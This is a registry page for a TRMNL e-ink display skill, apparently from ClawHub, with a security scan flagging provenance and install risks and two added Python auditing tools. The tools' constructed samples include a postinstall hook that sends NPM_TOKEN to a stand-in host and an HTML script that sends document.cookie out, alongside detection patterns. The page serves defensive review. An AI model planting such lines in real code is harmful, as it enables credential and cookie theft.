Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

TRMNL Display

v1.0.3

Generate content for TRMNL e-ink display devices using the TRMNL CSS framework and send via the trmnl CLI. Use when the user wants to display information on their TRMNL device, send messages to an e-ink display, create dashboard content, show notifications, or update their terminal display. Supports rich layouts with the TRMNL framework (flexbox, grid, tables, progress bars, typography utilities).

2 · 2.7k · 0 current · 0 all-time
by peetzweg (@peetzweg)
MIT-0
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
SKILL.md is a focused TRMNL content generator and send workflow, which matches the skill description. However, the manifest declares no required binaries or credentials, while the runtime instructions tell the agent to run npm and the trmnl CLI (npm install -g trmnl-cli; trmnl send; trmnl plugin add). Not listing those binaries is an inconsistency the publisher should have resolved in the metadata. The package source and homepage are also unknown (registry metadata shows no homepage and 'Source: unknown'), so provenance is unclear.
Instruction Scope
The SKILL.md stays within the stated purpose: generate HTML using the TRMNL framework and POST it to configured TRMNL webhook plugins. It instructs writing files to /tmp and sending them to plugin webhook URLs (e.g., https://trmnl.com/api/custom_plugins/{uuid}). This is expected for the stated function, but it means the skill transfers user-generated HTML to external endpoints; ensure those plugin URLs are trusted and under the user's control. The doc also explicitly warns not to echo content back to chat, which suggests the payload may be sensitive.
Install Mechanism
There is no formal install spec in the registry (instruction-only skill), which is lower risk than an automated installer. However, SKILL.md tells the operator to run 'npm install -g trmnl-cli@latest'; installing a global npm package executes third-party code from the npm registry, including any lifecycle scripts (preinstall, install, postinstall) the package declares. Because the skill metadata neither declares this requirement nor provides a trusted upstream or homepage, that step increases risk and should be performed only after verifying the package and its publisher.
Credentials
The manifest requests no environment variables, credentials, or config paths. The instructions use UUID-based plugin webhook URLs but do not ask for unrelated secrets. Note that the UUID in the URL is the only thing identifying the sender, so treat it as a secret: anyone who learns the URL can push content to the display. The webhook API docs also show that HTML in payloads is not auto-escaped and that Liquid templates can access user fields (email, name) on the TRMNL side, so users should avoid sending sensitive data in content.
Persistence & Privilege
The skill does not request always:true, declares no system-wide changes, and defines no install-time persistence or config writes in the registry. Autonomous invocation is allowed by default, but it is not combined with other high-risk factors here.
What to consider before installing
Key things to check before installing or using this skill:
1) Provenance: the registry entry has no homepage and the source is listed as unknown. Verify the origin of the trmnl-cli npm package and prefer installing it manually after reviewing it on npmjs.com or in its repository. Do not run global installs blindly.
2) Declared requirements mismatch: the skill metadata lists no required binaries, but SKILL.md instructs using npm and the trmnl CLI. Treat that as an omission and expect to need node, npm and the trmnl-cli executable.
3) External webhooks: the workflow sends HTML to plugin webhook URLs (https://trmnl.com/api/custom_plugins/{uuid} or similar). Only add or send to plugin URLs you control and trust. Any content you send is visible to the receiving endpoint, and (per the docs) HTML is not auto-escaped on the server side.
4) Sensitive data: do not include passwords, API keys, personal data, or secrets in HTML payloads. The docs show Liquid templates can access user data on the TRMNL side, so avoid embedding anything sensitive in merge_variables.content.
5) Validate locally: run 'trmnl validate --file' and inspect the payload before sending. If possible, test against a benign endpoint you control (a simple server you run) to confirm what the CLI actually transmits.
6) Package safety: audit the trmnl-cli npm package before global installation. Check the publisher, recent release notes, install-time scripts, and the package contents for unexpected network or filesystem operations.
7) Higher assurance: ask the skill publisher for a repository or homepage and a signed release or source link; without that, treat this skill as unvetted.
These findings leave the skill coherent with its stated function, but the provenance and metadata mismatches are enough to withhold a 'benign' verdict without further verification.
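The pre-install audit recommended under Install Mechanism and in item 6 above, as an added example (this is not code from the skill, from trmnl-cli, or from ClawHub). It inspects an unpacked npm package on disk, offline: it lists the lifecycle scripts npm would run automatically at install time and greps the JavaScript for calls a display-content CLI has little reason to make. Obtaining the tree with `npm pack trmnl-cli@latest` followed by `tar xzf trmnl-cli-*.tgz` (which unpacks into ./package) is a real npm workflow; the sample package the `demo()` function writes is constructed here to trip the checks and is not the real trmnl-cli.

```python
"""Offline audit of an unpacked npm package before a global install.

Added example, not part of the skill or trmnl-cli. Real-world use:
    npm pack trmnl-cli@latest && tar xzf trmnl-cli-*.tgz   # unpacks to ./package
    python audit.py  ->  audit_package_dir("package")
"""
import json
import re
import tempfile
from pathlib import Path

# Hooks npm runs on `npm install` with no further user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Calls worth a manual look in a CLI that only renders HTML and POSTs it.
# Any one may be legitimate; the point is to know where they are before installing.
SUSPICIOUS = {
    "child_process": re.compile(r"\bchild_process\b|\bexec(?:Sync)?\s*\(|\bspawn(?:Sync)?\s*\("),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "network": re.compile(r"\brequire\(['\"](?:https?|net|dgram)['\"]\)|\bfetch\s*\(|\bhttps?\.request\b"),
    "env_access": re.compile(r"\bprocess\.env\b"),
    "home_dir_fs": re.compile(r"os\.homedir\(\)|~/\.(?:ssh|aws|npmrc)"),
    "obfuscation": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\\x[0-9a-fA-F]{2}\\x[0-9a-fA-F]{2}"),
}


def audit_package_dir(pkg_dir):
    """Return a report dict: manifest facts, install hooks, and per-pattern file hits."""
    root = Path(pkg_dir)
    manifest = json.loads((root / "package.json").read_text(encoding="utf-8"))
    scripts = manifest.get("scripts", {})
    hooks = {name: cmd for name, cmd in scripts.items() if name in LIFECYCLE_HOOKS}

    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix not in (".js", ".cjs", ".mjs", ".ts"):
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for name, pattern in SUSPICIOUS.items():
            if pattern.search(text):
                findings.setdefault(name, []).append(path.relative_to(root).as_posix())

    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        # A missing repository field is the same provenance gap the scan above flags.
        "repository": manifest.get("repository"),
        "bin": manifest.get("bin", {}),
        "hooks": hooks,
        "findings": findings,
    }


def verdict(report):
    """True when the package deserves a manual read before `npm install -g`."""
    return bool(report["hooks"]) or bool(report["findings"]) or report["repository"] is None


def write_constructed_sample(base):
    """Write a constructed (fake) package tree that trips the checks. Not trmnl-cli."""
    base = Path(base)
    (base / "lib").mkdir(parents=True, exist_ok=True)
    (base / "package.json").write_text(json.dumps({
        "name": "example-cli", "version": "0.0.1",
        "bin": {"example": "bin/example.js"},
        "scripts": {"postinstall": "node lib/setup.js", "test": "echo ok"},
    }))
    # Install-time script that runs a shell command and reads an environment variable.
    (base / "lib" / "setup.js").write_text(
        'const { execSync } = require("child_process");\n'
        'const token = process.env.NPM_TOKEN;\n'
        'execSync("curl -s https://example.invalid/?t=" + token);\n')
    # Benign file: no hits expected.
    (base / "lib" / "render.js").write_text("module.exports = (html) => html.trim();\n")
    return base


def demo():
    """Audit the constructed sample in a temp dir and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_package_dir(write_constructed_sample(tmp))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The pattern list is deliberately broad; a hit is a place to read, not a verdict. What does settle the question is the hooks entry: an install script that shells out and reads process.env is exactly the code that runs before you ever type trmnl send.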
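The local stand-in endpoint suggested in item 5 above, combined with the checks from Credentials and item 4, as an added example (not code from the skill, from trmnl-cli, or from TRMNL). It assumes the CLI posts a JSON body of the form {"merge_variables": {...}} with the HTML under merge_variables.content, as the checklist's mention of merge_variables.content implies; it never renders anything, it only reports what would have left the machine: active markup (which the TRMNL side does not escape), external hosts referenced by the HTML, and secret-like strings anywhere in the variables. The SAMPLE_BODY payload is constructed here to trigger every check.

```python
"""Benign stand-in for https://trmnl.com/api/custom_plugins/{uuid}.

Added example, not part of the skill or trmnl-cli. Assumes the webhook body is
{"merge_variables": {"content": "<html...>", ...}}. Run it, then point the CLI
(or curl) at http://127.0.0.1:8080/ instead of the real plugin URL.
"""
import json
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# Strings that should never appear in a display payload (constructed, not exhaustive).
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "bearer_token": re.compile(r"\bBearer\s+[A-Za-z0-9._~+/-]{20,}"),
    "password_kv": re.compile(r"(?i)\b(?:password|passwd|api[_-]?key|secret)\s*[:=]\s*\S+"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
}
# Markup that matters because the server side does not escape HTML.
ACTIVE_MARKUP = re.compile(r"<\s*(script|iframe|object|embed|form)\b|\bon\w+\s*=|javascript:", re.I)
EXTERNAL_REF = re.compile(r"""(?:src|href)\s*=\s*["']?(https?:)?//([^/"'\s>]+)""", re.I)


def inspect_payload(body):
    """Parse a webhook body and return what a reviewer wants to know before it is sent."""
    doc = json.loads(body)
    merge = doc.get("merge_variables", {})
    flat = json.dumps(merge)  # scan every variable, not only `content`
    content = merge.get("content", "")
    return {
        "variables": sorted(merge),
        "content_bytes": len(content.encode()),
        "active_markup": sorted({m.group(0).lower() for m in ACTIVE_MARKUP.finditer(content)}),
        "external_hosts": sorted({m.group(2).lower() for m in EXTERNAL_REF.finditer(content)}),
        "secrets": sorted(name for name, pat in SECRET_PATTERNS.items() if pat.search(flat)),
    }


def safe_to_send(report):
    """Policy: no secret-like strings and no active markup."""
    return not report["secrets"] and not report["active_markup"]


class InspectingHandler(BaseHTTPRequestHandler):
    """Accepts the POST, logs the report, and answers 200 or 422. Renders nothing."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        try:
            report = inspect_payload(body)
        except (ValueError, AttributeError) as exc:
            self.send_response(400)
            self.end_headers()
            self.wfile.write(f"bad payload: {exc}".encode())
            return
        self.log_message("report: %s", json.dumps(report))
        self.send_response(200 if safe_to_send(report) else 422)
        self.end_headers()
        self.wfile.write(json.dumps(report).encode())


# Constructed sample: a layout with an external image, an injected script, and a
# stray credential in a second merge variable.
SAMPLE_BODY = json.dumps({"merge_variables": {
    "content": '<div class="layout"><span class="title">Build status</span>'
               '<img src="https://cdn.example.invalid/badge.svg">'
               '<script>fetch("https://x.example.invalid/?c="+document.cookie)</script></div>',
    "note": "deploy password=hunter2",
}}).encode()


if __name__ == "__main__":
    print(json.dumps(inspect_payload(SAMPLE_BODY), indent=2))
    HTTPServer(("127.0.0.1", 8080), InspectingHandler).serve_forever()
```

How trmnl send picks its target is not shown on this page, so the quickest check is to replay the file the skill wrote to /tmp with curl: `curl -sS -X POST http://127.0.0.1:8080/ -H 'Content-Type: application/json' --data @/tmp/payload.json`. A 422 with a non-empty "secrets" or "active_markup" list means the payload should not go to the real plugin URL.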


latest: vk973jxd30m39ppkf8hcwyh8m4d80qtrt
